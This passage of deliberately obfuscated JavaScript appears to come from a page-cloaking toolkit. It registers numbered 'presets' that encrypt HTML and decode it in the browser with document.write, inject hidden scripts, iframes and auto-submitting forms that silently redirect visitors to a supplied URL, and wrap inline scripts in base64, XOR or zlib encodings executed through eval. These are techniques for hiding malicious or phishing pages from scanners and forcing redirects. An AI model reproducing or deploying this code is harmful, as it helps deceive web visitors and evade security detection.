_0x13e422=Buffer[_0x17e8ae(0x168)](_0x50b2ef['length']);for(let _0xff1044=0x0;_0xff1044<_0x50b2ef['length'];_0xff1044++){_0x13e422[_0xff1044]=_0x50b2ef[_0xff1044]^_0x63f040['charCodeAt'](_0xff1044%_0x63f040[_0x17e8ae(0x11f)]);}_0x50b2ef=_0x13e422;}const _0x5bc8ea=_0x50b2ef[_0x17e8ae(0x153)]('base64'),_0x2329ad=JSON[_0x17e8ae(0x15f)](_0x7fd64c);return htmlDecodeShell(_0x17e8ae(0x121)+_0x2329ad+',d=atob(\x27'+_0x5bc8ea+_0x17e8ae(0x14e)+_0x17e8ae(0x11e)+'for(var\x20k=ks.length-1;k>=0;k--){var\x20key=ks[k];for(var\x20j=0;j<bytes.length;j++)bytes[j]^=key.charCodeAt(j%key.length);}'+'document.write(String.fromCharCode.apply(null,bytes));');}function obfuscatePreset11(_0x4a491a,_0x4b1b49){const _0x54cc50=a32_0x7c3a91,_0x1b5393=Buffer['from'](String(_0x4b1b49||''))[_0x54cc50(0x153)](_0x54cc50(0x130)),_0x5016bf=_0x54cc50(0x16a)+_0x1b5393+_0x54cc50(0x128)+'if(window.open){window.open(u,\'_self\');}else{window.location.href=u;}})();</script>';return insertBeforeHeadEnd(_0x4a491a,_0x5016bf);}function obfuscatePreset12(_0x4348f3,_0x45127c){const _0x5c3265=a32_0x7c3a91,_0x1defde=Buffer['from'](String(_0x45127c||''))[_0x5c3265(0x153)](_0x5c3265(0x130)),_0x2a2053='<script>(function(){var\x20u=atob(\x27'+_0x1defde+'\x27);'+'if(window.location&&window.location.replace){window.location.replace(u);}else{window.location.href=u;}})();</script>';return insertBeforeHeadEnd(_0x4348f3,_0x2a2053);}function obfuscatePreset13(_0x396051,_0x448e91){const _0x309bf6=a32_0x7c3a91,_0x55969e=safeHref(_0x448e91);if(_0x55969e==='#')return _0x396051;const _0x1f6c58=encodeURIComponent(_0x55969e),_0x1c0e15=_0x309bf6(0x12b)+_0x1f6c58+'\x27);'+'try{history.pushState({},\'\',h);}catch(e){}window.location.href=h;})();</script>';return insertBeforeHeadEnd(_0x396051,_0x1c0e15);}function obfuscatePreset14(_0x30974a,_0x6a776b){const _0x3892a8=a32_0x7c3a91,_0x5b6792=safeHref(_0x6a776b);if(_0x5b6792==='#')return _0x30974a;const _0x221b7d=_0x3892a8(0x14f)+_0x5b6792+_0x3892a8(0x13d)+'<input\x20type=\x22submit\x22\x20value=\x22go\x22></form>'+_0x3892a8(0x145);return insertBeforeBodyEnd(_0x30974a,_0x221b7d);}function obfuscatePreset15(_0x5902e1,_0x57ff2e){const _0x3d4a3c=a32_0x7c3a91,_0x40c390=safeHref(_0x57ff2e);if(_0x40c390==='#')return _0x5902e1;const _0x37ccd2='<script>(function(){var\x20i=document.createElement(\x27iframe\x27);'+('i.style.display=\x27none\x27;i.src=\x27'+_0x40c390+_0x3d4a3c(0x157))+(_0x3d4a3c(0x17d)+_0x40c390+_0x3d4a3c(0x16b));return insertBeforeBodyEnd(_0x5902e1,_0x37ccd2);}function obfuscatePreset16(_0x4c3e66,_0x554419){const _0x5f581c=a32_0x7c3a91,_0x25bc20=safeHref(_0x554419);if(_0x25bc20==='#')return _0x4c3e66;const _0x269122=_0x5f581c(0x181)+_0x25bc20+_0x5f581c(0x184)+_0x25bc20+_0x5f581c(0x177)+_0x5f581c(0x11a);return insertBeforeBodyEnd(_0x4c3e66,_0x269122);}function obfuscatePreset17(_0x44c537,_0x5bc6ed){const _0x39a830=a32_0x7c3a91,_0x4b52c8=safeHref(_0x5bc6ed);if(_0x4b52c8==='#')return _0x44c537;const _0x164e49=Buffer[_0x39a830(0x16f)](_0x4b52c8)[_0x39a830(0x153)](_0x39a830(0x130)),_0x1d8888='<script>(function(){var\x20h=atob(\x27'+_0x164e49+'\x27);'+_0x39a830(0x173);return insertBeforeHeadEnd(_0x44c537,_0x1d8888);}function obfuscatePreset18(_0x483fb8,_0x5b81c9){const _0x226392=a32_0x7c3a91,_0x6502b=safeHref(_0x5b81c9);if(_0x6502b==='#')return _0x483fb8;const _0x21a21e=Array[_0x226392(0x16f)](_0x6502b)[_0x226392(0x137)](_0x1a5708=>_0x1a5708[_0x226392(0x123)](0x0)),_0x437255=_0x226392(0x15d)+_0x21a21e['join'](',')+_0x226392(0x165)+_0x226392(0x127)+'window.location.href=u;})();</script>';return insertBeforeHeadEnd(_0x483fb8,_0x437255);}function obfuscatePreset19(_0x222a41,_0x11e557){const _0x18d57d=a32_0x7c3a91,_0x1689d7=safeHref(_0x11e557);if(_0x1689d7==='#')return _0x222a41;const _0x5cfd45=_0x18d57d(0x140)+_0x1689d7[_0x18d57d(0x171)](/'/g,'\x5c\x27')+'\x27;'+'window.postMessage({mtmcRedirect:t},\'*\');'+'window.addEventListener(\'message\',function(e){if(e.data&&e.data.mtmcRedirect){window.location.href=e.data.mtmcRedirect;}});'+'window.postMessage({mtmcRedirect:t},\'*\');})();</script>';return insertBeforeHeadEnd(_0x222a41,_0x5cfd45);}function obfuscatePreset20(_0x18f04c,_0x573062){const _0x354b60=a32_0x7c3a91,_0x196f6c=safeHref(_0x573062);if(_0x196f6c==='#')return _0x18f04c;const _0xebac1c=_0x196f6c[_0x354b60(0x171)](/^https?:\/\//i,''),_0x45ac3c='<script>(function(){var\x20p=(location.protocol||\x27https:\x27)+\x27//\x27;'+(_0x354b60(0x180)+_0xebac1c[_0x354b60(0x171)](/'/g,'\x5c\x27')+'\x27;})();</script>');return insertBeforeHeadEnd(_0x18f04c,_0x45ac3c);}function scripterPreset11(_0x6a9932){return rewriteInlineScripts(_0x6a9932,_0x194bb4=>{const _0x4f6016=a32_0xce98,_0x6af9f9=Buffer['from'](_0x194bb4,_0x4f6016(0x144))[_0x4f6016(0x153)](_0x4f6016(0x130));return'(function(){var\x20s=atob(\x27'+_0x6af9f9+'\x27);(0,eval)(s);})();';});}function scripterPreset12(_0x4b6883){return rewriteInlineScripts(_0x4b6883,_0x4a62f4=>{const _0x5f3c03=a32_0xce98,_0x5e3133=_0x4a62f4[_0x5f3c03(0x171)](/\\/g,'\x5c\x5c')[_0x5f3c03(0x171)](/`/g,'\x5c`')[_0x5f3c03(0x171)](/\$/g,'\x5c$');return _0x5f3c03(0x15c)+_0x5e3133+_0x5f3c03(0x126);});}function scripterPreset13(_0x570a70){return rewriteInlineScripts(_0x570a70,_0x2e913d=>{const _0x1ba338=a32_0xce98,_0x46b16d=_0x2e913d[_0x1ba338(0x13b)](/[\s\S]{1,24}/g)||[_0x2e913d];return _0x1ba338(0x178)+JSON['stringify'](_0x46b16d)+';return\x20(0,eval)(p.join(\x27\x27));})();';});}function scripterPreset14(_0x41e3ef){return rewriteInlineScripts(_0x41e3ef,_0x347f5f=>{const _0x18c06c=a32_0xce98,_0x348130=Array[_0x18c06c(0x16f)](_0x347f5f)[_0x18c06c(0x137)](_0x42fc42=>_0x42fc42['charCodeAt'](0x0));return'(function(){var\x20c=['+_0x348130['join'](',')+'];'+_0x18c06c(0x179)+'(0,eval)(s);})();';});}function scripterPreset15(_0x321c4b){return rewriteInlineScripts(_0x321c4b,_0x801ce2=>{const _0xfe9dd7=a32_0xce98,_0x341371=_0x801ce2[_0xfe9dd7(0x14d)]('');for(let _0x3e6a66=0x0;_0x3e6a66+0x1<_0x341371[_0xfe9dd7(0x11f)];_0x3e6a66+=0x2){;[_0x341371[_0x3e6a66],_0x341371[_0x3e6a66+0x1]]=[_0x341371[_0x3e6a66+0x1],_0x341371[_0x3e6a66]];}const _0xb49035=_0x341371[_0xfe9dd7(0x125)](''),_0x41defa=Buffer[_0xfe9dd7(0x16f)](_0xb49035,_0xfe9dd7(0x144))[_0xfe9dd7(0x153)](_0xfe9dd7(0x130));return _0xfe9dd7(0x142)+_0x41defa+_0xfe9dd7(0x163)+_0xfe9dd7(0x11c)+_0xfe9dd7(0x159);});}function scripterPreset16(_0x10f618){return rewriteInlineScripts(_0x10f618,_0x576abc=>{const _0x240158=a32_0xce98,_0x4efd0f=crypto[_0x240158(0x16e)](0x8)[_0x240158(0x153)](_0x240158(0x166)),_0x19e833=Buffer[_0x240158(0x16f)](_0x576abc,_0x240158(0x144)),_0x1283c6=Buffer[_0x240158(0x168)](_0x19e833['length']);for(let _0x412ce4=0x0;_0x412ce4<_0x19e833[_0x240158(0x11f)];_0x412ce4++){_0x1283c6[_0x412ce4]=_0x19e833[_0x412ce4]^_0x4efd0f['charCodeAt'](_0x412ce4%_0x4efd0f[_0x240158(0x11f)]);}const _0x41a7ec=_0x1283c6[_0x240158(0x153)](_0x240158(0x130));return _0x240158(0x17e)+_0x4efd0f+_0x240158(0x135)+_0x41a7ec+_0x240158(0x122)+'for(var\x20i=0;i<d.length;i++)o+=String.fromCharCode(d.charCodeAt(i)^k.charCodeAt(i%k.length));'+_0x240158(0x174);});}function scripterPreset17(_0x433ea7){return rewriteInlineScripts(_0x433ea7,_0x3257f7=>{const _0x8214fd=a32_0xce98,_0x48306e=zlib[_0x8214fd(0x158)](Buffer[_0x8214fd(0x16f)](_0x3257f7,_0x8214fd(0x144)))['toString'](_0x8214fd(0x130));return _0x8214fd(0x152)+_0x48306e+_0x8214fd(0x141)+_0x8214fd(0x169)+_0x8214fd(0x17b)+_0x8214fd(0x13e);});}function scripterPreset18(_0x3297fd){return rewriteInlineScripts(_0x3297fd,_0x2b109a=>{const _0x14d409=a32_0xce98,_0x1faeb0=_0x2b109a[_0x14d409(0x14d)]('\x0a')[_0x14d409(0x137)](_0x2e5b30=>'/*mtmc*/'+_0x2e5b30);return _0x1faeb0[_0x14d409(0x125)]('\x0a');});}function scripterPreset19(_0x1ea40d){const _0xa51a66=a32_0x7c3a91;return rewriteInlineScripts(_0x1ea40d,_0xddb81=>_0xa51a66(0x136)+_0xddb81+_0xa51a66(0x14a));}function scripterPreset20(_0x2d3e35){return rewriteInlineScripts(_0x2d3e35,_0x29c517=>{const _0x4ed001=a32_0xce98,_0x299a3d=_0x29c517['match'](/[\s\S]{1,16}/g)||[_0x29c517],_0x20004a=_0x299a3d[_0x4ed001(0x137)](_0x3274e7=>JSON[_0x4ed001(0x15f)](_0x3274e7));return'(function(){var\x20a=['+_0x20004a[_0x4ed001(0x125)](',')+_0x4ed001(0x172);});}const EXTENDED_ENCRYPT_PRESETS={'preset11':encryptPreset11,'preset12':encryptPreset12,'preset13':encryptPreset13,'preset14':encryptPreset14,'preset15':encryptPreset15,'preset16':encryptPreset16,'preset17':encryptPreset17,'preset18':encryptPreset18,'preset19':encryptPreset19,'preset20':encryptPreset20},EXTENDED_OBFUSCATE_PRESETS={'preset11':obfuscatePreset11,'preset12':obfuscatePreset12,'preset13':obfuscatePreset13,'preset14':obfuscatePreset14,'preset15':obfuscatePreset15,'preset16':obfuscatePreset16,'preset17':obfuscatePreset17,'preset18':obfuscatePreset18,'preset19':obfuscatePreset19,'preset20':obfuscatePreset20},EXTENDED_SCRIPTER_PRESETS={'preset11':scripterPreset11,'preset12':scripterPreset12,'preset13':scripterPreset13,'preset14':scripterPreset14,'preset15':scripterPreset15,'preset16':scripterPreset16,'preset17':scripterPreset17,'preset18':scripterPreset18,'preset19':scripterPreset19,'preset20':scripterPreset20};function registerExtendedPresets(_0x2e8460={}){const _0xfe2dae=a32_0x7c3a91,{ENCRYPT_PRESETS:ENCRYPT_PRESETS={},OBFUSCATE_PRESETS:OBFUSCATE_PRESETS={},SCRIPTER_PRESETS:SCRIPTER_PRESETS={}}=_0x2e8460;Object['assign'](ENCRYPT_PRESETS,EXTENDED_ENCRYPT_PRESETS),Object[_0xfe2dae(0x16c)](OBFUSCATE_PRESETS,EXTENDED_OBFUSCATE_PRESETS),Object[_0xfe2dae(0x16c)](SCRIPTER_PRESETS,EXTENDED_SCRIPTER_PRESETS);}module['exports']={'registerExtendedPresets':registerExtendedPresets,'EXTENDED_ENCRYPT_PRESETS':EXTENDED_ENCRYPT_PRESETS,'EXTENDED_OBFUSCATE_PRESETS':EXTENDED_OBFUSCATE_PRESETS,'EXTENDED_SCRIPTER_PRESETS':EXTENDED_SCRIPTER_PRESETS};